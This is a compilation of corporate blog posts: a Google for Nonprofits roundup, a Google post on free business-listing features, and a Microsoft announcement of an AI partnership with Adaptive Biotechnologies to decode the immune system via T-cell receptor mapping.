G Suite allows teams to access data anywhere, update files in real time, and collaborate efficiently. Mercy Beyond Borders, a U.S.-based nonprofit with employees deployed in various countries, uses these tools to stay in sync with each other no matter where they are—from tracking finances on Google Sheets to sharing information with board members through Google Sites. And nonprofit MyFace takes advantage of Google’s security and privacy settings to store personal medical data for their patients. Read more about how these nonprofits used G Suite, and find out how to get started with G Suite, in this post.


Learn from “G4NP in Three,” a new YouTube Series

This year we launched our first-ever G4NP YouTube series, “G4NP in Three,” aiming to help nonprofits learn the basics about the Google for Nonprofits program and the process to get enrolled for each product. The videos also cover tips and tricks on how to make the most of the tools available, all in three minutes! Check out the videos and subscribe to stay updated on our latest content.

Introduction to G4NP tools: Tune into our G4NP in Three Series

Get inspired

By using tech in new ways, Action Against Hunger, Girl Scouts of Japan and Fundación Todo Mejora are able to focus their efforts on the work they do and care about most. Through our series “G4NP Around the Globe,” we highlighted how each of these nonprofits benefited with the help of Google tools. Action Against Hunger fundraised more than $20,000 from YouTube donations and used Google Ad Grants to increase site traffic—resulting in $66,000 worth of donations, which equates to feeding 1,466 children in need. Fundación Todo Mejora uses G Suite to easily share and store files, spread their message on their YouTube channel, and with the help of Ad Grants, they can reach suicidal teens who are searching for help. And Girl Scouts of Japan created a virtual tour using Google’s mapping tools, and used Google Forms to create quizzes that helps scouts earn badges.

Thanks to all nonprofits around the world for the work you do. We look forward to another year of working together to improve the lives of everyone around us!

5 new ways to connect with your customers on Google

Last year, we introduced five new ways to build an eye-catching online presence that shows customers what your business is all about. And the best part? They’re all free.

1. Create a free website in minutes

According to internal Google research, business listings with a website get 25-35% more clicks. And building your site doesn’t have to be complicated or time consuming. You can create a simple mobile-ready site for your business in less than 10 minutes with our automated website builder. Check out how Vince from Village Tailor in New York used his new website to bring in more customers.

2. Post about events, promotions, and more right on Google

It’s now easy to share Posts that show up when people find your business on Search and Maps. According to Ipsos research, 50 percent people look for promotions or discounts online, so it’s important to share offers, upcoming events, your latest news and more with potential customers right when they find your business.

3. Connect with your customers by answering their questions directly

As a business owner, you have the most reliable answers to your customers’ questions. With Questions and Answers, it’s easy to add frequently asked questions to your listing, answer questions from potential customers, and highlight top responses, so that people can get the most important info about your business right away.

4. Update your business listing without leaving Search

People trust businesses with current and relevant info online, and according to internal Google research, complete Google listings get seven times more clicks. Keep your listing updated with our easy-to-access business dashboard. Simply type your business name on Google Search, and you can complete your listing, share photos and posts related to your business, respond to reviews, and see how many views you’re getting.

5. Start messaging with your customers from Google

Customers don’t always have time to call when they want to reach out to your business. With messaging, people can text your business directly through your listing on Search. Your phone number remains private, so you and your customers can communicate safely, quickly, and easily. (Available in the US, Brazil, Canada and India).

You can use these simple features with your Google listing to stand out and attract new customers online. Get started today.

Microsoft and Adaptive Biotechnologies announce partnership using AI to decode immune system; diagnose, treat disease

The human immune system is an astonishing diagnostic system, continuously adapting itself to detect any signal of disease in the body. Essentially, the state of the immune system tells a story about virtually everything affecting a person’s health. It may sound like science fiction, but what if we could “read” this story? Our scientific understanding of human health would be fundamentally advanced. And more importantly, this would provide a foundation for a new generation of precise medical diagnostic and treatment options.

Photo of Peter Lee standing in front of a whiteboard covered in writing
Peter Lee, Corporate Vice President of AI + Research (Photo by Scott Eklund/Red Box Pictures)

Amazingly, this isn’t just science fiction, but can be science fact. And so we’re excited to announce a new partnership with Seattle-based Adaptive Biotechnologies, coupling the latest advances in AI and machine learning with recent breakthroughs in biotechnology to build a practical technology for mapping and decoding the human immune system. Together, we have a goal that is simple to state but also incredibly ambitious: create a universal blood test that reads a person’s immune system to detect a wide variety of diseases including infections, cancers and autoimmune disorders in their earliest stage, when they can be most effectively diagnosed and treated.

We believe deeply in the potential for this partnership with Adaptive and have made a substantial financial investment in the company. We have also begun a major research and development collaboration that involves Adaptive’s scientists working closely with our top researchers to use Adaptive’s innovative sequencing technology and Microsoft’s large-scale machine learning and cloud computing capabilities to make deep reading of the immune system a reality.

Adaptive CEO and co-founder Chad Robins said in a press release today this announcement comes at a time of inflection in healthcare and biotechnology, as we now have the technology to be able to map the immune system. The potential to help clinicians and researchers connect the dots and understand the relationship between disease states could eventually lead to a better understanding of overall human health.

Imagine a world with an “X-ray of the immune system.” This would open new doors to predictive medicine, as a person’s immunological history is believed to shape their response to new pathogens and treatments in ways that are currently impossible to explore. The impact on human health of such a universal blood test that reads a person’s exposure and response to disease would be, in a word, transformational.

Photo of lab worker's gloved hands working with immunosequencing kit

The immune system’s response to the presence of disease is expressed in the genetics of special cells, called T-cells and B-cells, which form the distributed command and control for the adaptive immune system. Each T-cell has a corresponding surface protein called a T-cell receptor (TCR), which has a genetic code that targets a specific signal of disease, or an antigen.

Mapping TCRs to antigens is a massive challenge, requiring very deep AI technology and machine learning capabilities coupled with emerging research and techniques in computational biology applied to genomics and immunosequencing. A challenge of this nature hasn’t been solved before, but with the collective team we’ve formed with Adaptive, we believe we have the experience, technical capability and tenacity to deliver.

The result would provide a true breakthrough – a detailed insight into what the immune system is doing. Put simply, sequencing the immune system can reveal what diseases the body currently is fighting or has ever fought. A blood sample, therefore, contains the key information needed to read what the immune system is currently detecting.

The basis of this approach is to develop a universal T-cell receptor/antigen map – a model of T-cell receptor sequences and the codes of the antigens they have fought. This universal map of the immune system will enable earlier and more accurate diagnosis of disease and eventually lead to a better understanding of overall human health. Microsoft and Adaptive expect this universal map to be the key for the research and development of simple blood-based diagnostics that are broadly accessible to people around the world.

We’re incredibly excited to collaborate on this project with our partners at Adaptive, who have developed unique immunosequencing capabilities and immune system knowledge, along with very large data sets of TCR sequences. Classifying and mapping this data represents a large-scale machine learning project for which we’ll lean heavily on Microsoft’s cloud computing capabilities and our elite research teams.

We know this partnership and the resulting work represent a big challenge. But we believe in the impact technology can have in healthcare, specifically how AI, the cloud and collaboration with our partners can come together and transform what is possible.

This project is a cornerstone of our Healthcare NExT initiative, with a goal to empower innovators and pair leading capabilities in life and computer sciences to dramatically accelerate the diagnosis and treatment of autoimmune disorders, cancer and infectious disease. At Microsoft, we believe that AI and the cloud have the power to transform healthcare – improving outcomes, providing better access and lowering costs. The Microsoft Healthcare NExT initiative was launched last year to maximize the ability of artificial intelligence and cloud computing to accelerate innovation in the healthcare industry, advance science through technology and turn the lifesaving potential of next discoveries into reality.

We’ll share more details at the upcoming JP Morgan Healthcare Conference in San Francisco, including a fireside chat at 5 p.m. PT on Wednesday, Jan. 10 with Chad Robins and myself called “Decoding the Human Immune System: A Closer Look at a Landmark Partnership.”

The post Microsoft and Adaptive Biotechnologies announce partnership using AI to decode immune system; diagnose, treat disease appeared first on The Official Microsoft Blog.

Scroll Up